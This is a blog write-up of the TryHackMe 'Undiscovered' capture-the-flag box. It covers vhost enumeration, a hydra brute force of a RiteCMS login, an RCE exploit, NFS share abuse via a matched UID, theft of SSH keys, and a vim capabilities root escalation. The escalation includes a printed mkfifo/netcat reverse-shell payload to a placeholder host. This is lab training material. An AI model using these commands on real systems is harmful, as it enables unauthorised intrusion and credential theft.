Undiscovered Write-up THM

-

 Hello fellow hackers, I am back with another write-up for you all so let's get started.

 Today we are doing Undiscovered box on tryhackme.com created by ch4rm.

 The topics we are going to cover are:-

  • Virtual hosts enumeration
  • CMS bruteforcing
  • Getting reverse-shell using an exploit from exploit-db
  • Mounting file system and accessing data of victim machine on our local machine
  • Horizontal privilege escalation using a script on victim machine
  • And finally privilege escalation using vim.basic capabilities

So let's get started,

Virtual Hosts Enumeration

As our general methodology goes, we'll start with an nmap scan 

# Nmap 7.80 scan initiated Tue Nov 10 01:56:45 2020 as: nmap -sC -sV -oN nmapscans 10.10.122.39
Nmap scan report for undiscovered.thm (10.10.122.39)
Host is up (0.40s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:76:81:49:50:bb:6f:4f:06:15:cc:08:88:01:b8:f0 (RSA)
|   256 2b:39:d9:d9:b9:72:27:a9:32:25:dd:de:e4:01:ed:8b (ECDSA)
|_  256 2a:38:ce:ea:61:82:eb:de:c4:e0:2b:55:7f:cc:13:bc (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100021  1,3,4      35696/tcp   nlockmgr
|   100021  1,3,4      45836/tcp6  nlockmgr
|   100021  1,3,4      51820/udp6  nlockmgr
|   100021  1,3,4      57664/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp open  nfs     2-4 (RPC #100003)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 10 01:57:37 2020 -- 1 IP address (1 host up) scanned in 51.62 seconds

-sC:- runs default scripts

-sV:- Checks for the service versions

-oN:- To save the output of our scan

 Ok so we see,

  1. port 22 - ssh
  2. port 80 - http
  3. port  111- rpc
  4. port 2049 - nfs

let's see what port 80 holds for us,

 


The website is just a static page and the source code also didn't had anything interesting so let's move on,

Now the second thing I always try when enumerating is doing a directory scan

gobuster dir -u http://undiscovered.thm/ -w /Seclist/Discovery/Web-Content/directory-list-2.3-medium.txt

-u:- for specifying URL

-w:- for specifying wordlist

We didn't find anything interesting so moving on let's try enumerating subdomain and virtual hosts

gobuster dns -d undiscovered.thm -w /Seclist/Discovery/DNS/subdomains-top1million-110000.txt

-d:- for specifying domain string

DNS enumeration didn't gave anything but I found some good stuff from vhosts enumeration

gobuster vhost -u undiscovered.thm -w /Seclist/Discovery/DNS/subdomains-top1million-110000.txt | grep 200

The result was quite messy so piping "grep 200" helps clean the result and gives us the hosts with status code 200

Now that we have found some let's see what contents they hold,

After testing some of the hosts that we found, I added two virtual hosts to my /etc/hosts file:-

  • start.undiscovered.thm
  • deliver.undiscovered.thm

 

start.undiscovered.thm:-

 


every host was same as the above website, except for deliver.undiscovered.thm:-


Now that we have found some lead, let's get on to enumerating this host.

Again I ran a gobuster scan on this website and found:-

CMS Bruteforcing

After finding the directories the one that looked pretty interesting to me was /cms, So I decided to take a look at it,


It looks like we have a login page, the first thing I decided to try on was logging using default credentials

"admin:admin" , which obviously gave an error.

As you can see in the image above RiteCMS verison is 2.2.1 , So I tried to google around and find an exploit for this version,

I found a Remote Code Execution exploit for this particular version, but the catch is that the exploit requires authentication, i.e. we need credentials

Here comes hydra,

Using hydra I found the credentials for admin,

hydra -l admin -P /usr/share/wordlists/rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or Password wrong"

-l :- to specify username

-P :- to specify the wordlist that we want to use

http-post-form :- tells hydra that we want to attack an http-form using post request, when using this we need to also specify the parameters that are accepting "username" and "password", in this case username and userpw.

Now that we have a password let's exploit RiteCMS.

Getting a reverse-shell

 Using the RCE exploit with the credentials we obtained,

On running a netcat listener we get a reverse shell back as the user www-data


 Mounting the nfs share and accessing the data for the user william

Ok so now that we have a foothold on the machine let's enumerate and look for some privilege escalation vectors,

On looking back to our nmap scan we saw that the machine was hosting nfs share on port 2049, to get more details about it we look into /etc/exports file

We can see the share name as /home/william, let's mount it on our machine and access it's data

sudo mount -t nfs <machine IP>:/home/william /mnt/files

We mounted the share but when trying to access the folder I got "permission denied" , 

Now comes the tricky part,

So after doing some research I figured that we need to create a user william on our machine with the UID 3003 to access /home/william share that we mounted

Why use the UID 3003, that's because when I accessed the /etc/passwd file on our victim machine user william had the UID 3003.


So we created the user william and now we can access the data in the shares,


To make my life easier I changed the user permissions using chmod 777 on /home/william directory so that I can access it using www-data

Horizontal privilege escalation using a script on victim machine

 Now that we have access to william's folder, let's move on to get access to leonard's data

As you can see in previous images, there was a script available to us in william's directory

Running the script with an argument gave us an output like this,

./script test
/bin/cat: /home/leonard/test: No such file or directory

So I used  this script to grab leonard's ssh keys,

Now, we can simply ssh into the machine via user leonard,

 

Privilege escalation using vim.basic capabilities

Let's do some enumeration using linpeas,

On reading the linpeas output, I found a really interesting Privesc vector that uses capabilites  vulnerability of vim,

A quick search at GTFO bins gave me the command I need to escalate to root,

vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Or so I thought, unfortunately this set of commands didn't work but I knew that the privesc can be done using vim, so I started enumerating more and found out some interesting stuff in /home/leonard/.viminfo file,

(Note: .viminfo file is used to store command line history, search string history etc.)

Using this payload, I started a netcat listener on my machine and got a reverse-shell.

/usr/bin/vim -c ':py import os; os.setuid(0); os.execl("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f")'


We got Root!! This was a really fun box and taught me a lot of new stuff.




Comments

Post a Comment

Popular posts from this blog

Blog write-up THM

-
Image
Another week, another write-up Blog is a medium difficulty room created by Nameless0ne on tryhackme.com :- https://tryhackme.com/room/blog I'll try my best to explain about all the tools and methodologies, The goal of this room is to teach:- Wordpress Enumeration Gaining a shell using a unique vulnerability for a specific Wordpress version Getting root privileges using a very creative vulnerability So let's get started. So, after starting up the room, the first thing we always do is to run an nmap scan to see all the open ports and services running on the machine. nmap -sC -sV <machine-IP> -oN nmapscan -sC:- is used for a script scan -sV:- Shows us the version of all the services running -oN:- stores the result in a file with .nmap format And by the result we can see:- PORT     STATE      SERVICE 22           open          ssh          80      ...
Read more

Daily Bugle Write up

-
Image
Hello fellow hacker, today I'm going to help you solve the machine Daily bugle on TryHackMe:- https://tryhackme.com/room/dailybugle So let's begin. The main objectives of this machine is to:- Compromise joomla CMS via SQL injection vulnerability Cracking hash using a tool called john the ripper. And taking advantage of a b inary called 'yum' that allowed for privilege escalation # First step we begin by running an nmap scan against the target machine:- nmap -sC -sV <target-machine-IP> -oN nmapscans -sC :- this tag runs a script scan on target machine -sV :- this tag detects services and versions of services running on the machine -oN :- this tag allows us to save the result for future reading. As the result shows there's:- PORT       STATE SERVICE ------------------------------------------ 22/tcp       open     ssh 80/tcp       open     http 3306 /tcp   open   ...
Read more